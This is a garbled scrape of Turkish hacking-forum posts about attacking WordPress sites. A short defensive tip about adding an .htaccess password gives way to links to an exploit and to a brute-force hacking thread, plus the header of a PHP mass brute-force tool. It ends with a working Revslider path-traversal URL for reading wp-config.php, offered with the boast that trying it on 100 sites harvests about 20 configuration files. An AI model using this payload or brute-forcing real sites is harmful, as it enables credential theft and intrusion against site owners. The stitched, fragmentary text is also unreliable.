Wordpress sitemize saldırı alıyoruz şifre ne yapıp ne edip wordlist ile taratıp bulunuyor. Brute Force olmasa bile bypass ile Dashboard'a erişilebiliniyor.
*Bunu engellemek için ne yapacağız?*
* wp-admin girişine .htaccess ile ek bir şifre koyacağız.*
- Öncelikle hostunuzda Cpanel üzerinde...
Bildiğiniz üzere wordpress veri tabanlarında userler için özel şifreleme vardır (Salt) yani bu durumda sistemde kasma olur ve aşırı yükleme olursa veritabanı çöker.
Bu exploiti bir kaç kişi açıtığınızı var sayarsak veritabanının çökmesine neden olacaktır.
Exploit: http://link.tl/1xJHv
Konuyu şu linkteki konu için açtım.Videolu anlatımı daha iyi olur yeniler için.
http://spyhackerz.com/forum/threads/brute-force-kullan%C4%B1m%C4%B1-hack.6416/
<?
# Priv8 Wordpress Mass brute Force ^_*
# Coded by Lagrip-dz
# Devloped by Th3 K!LL3r Dz
# Style Leacked By Th3 K!LL3r Dz
# copyright to sec4ever.com
# special Greet'z to : n4ssim , Damane2011
# Greet'z to : all sec4ver members...
Isko~
Thread
mass bruteforcer
wordpresswordpresshackwordpress mass bruteforce
Sitelerin sonuna aşağıdaki url yi ekleyin configleri toplayın , birçok sitede açık aktif şekilde durmaktadır.
100 sitede deneseniz en az 20 tane config alırsınız.
wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php